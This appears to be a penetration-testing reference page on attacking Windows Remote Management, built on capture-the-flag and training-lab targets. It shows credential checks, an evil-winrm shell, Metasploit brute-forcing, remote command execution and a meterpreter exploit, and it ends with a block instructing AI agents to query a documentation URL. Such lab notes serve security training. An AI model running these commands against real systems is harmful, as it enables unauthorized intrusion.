# Port 5985 - WINRM

WinRM (Windows Remote Management) is a Windows-based service that enables administrators to remotely manage and execute commands on Windows machines. It's built on the WS-Management protocol, which is a standard web services protocol used for remote software and hardware management.

Let's check if we have access through winrm.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"  
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```

And we can exploit it. So, lets get the shell.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice" 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
```

### WINRM Bruteforcing

```
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit
```

Note: We are setting the PASSWORD because in the recent version of the "winrm\_login" module, the PASSWORD option is required unless using Kerberos authentication. Metasploit will still use the USERPASS\_FILE file.

<figure><img src="/files/VgyuLqLalx20IWo6vYvk" alt=""><figcaption></figcaption></figure>

#### Checking WinRM supported authentication method&#x20;

This is very important to know, before we try to connect to the WinRM service. We need to use a valid authentication method while connecting to the service. You can find more information about the authentication from the below link: <https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections>

**Commands:**

```
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/380496f1343b96af23c4dea35fe673a5642e8c9a4c4f9859d4ee2cd5659bf869.jpg" alt=""><figcaption></figcaption></figure>

Target supports two authentication types i.e Basic and Negotiate.

#### &#x20;Execute command on the target server using winrm\_cmd module.

**Commands:**

```
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/2c0e2801120e6b8ae2e84fc77e8cef101f23bcfd770cfbf2e4a0d6561221d22c.jpg" alt=""><figcaption></figcaption></figure>

We have successfully executed the command “whoami” on the remote server.&#x20;

#### winrm\_script\_exec exploit module

Now, we will use the winrm\_script\_exec exploit module to get the meterpreter shell.

**Commands:**

```
use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/c72034279447c23766737fbd21b8f0eb77382001474a0af62d2ad733bd747dcb.jpg" alt=""><figcaption></figcaption></figure>

<figure><img src="https://assets.ine.com/lab/learningpath/a2aecf9d33fefe4a933e80615874293e8e9a3834d2f83e702a3ba47af4c266f8.jpg" alt=""><figcaption></figcaption></figure>

We have gained the meterpreter session.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.cavementech.com/pentesting-quick-reference/port-5985-winrm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.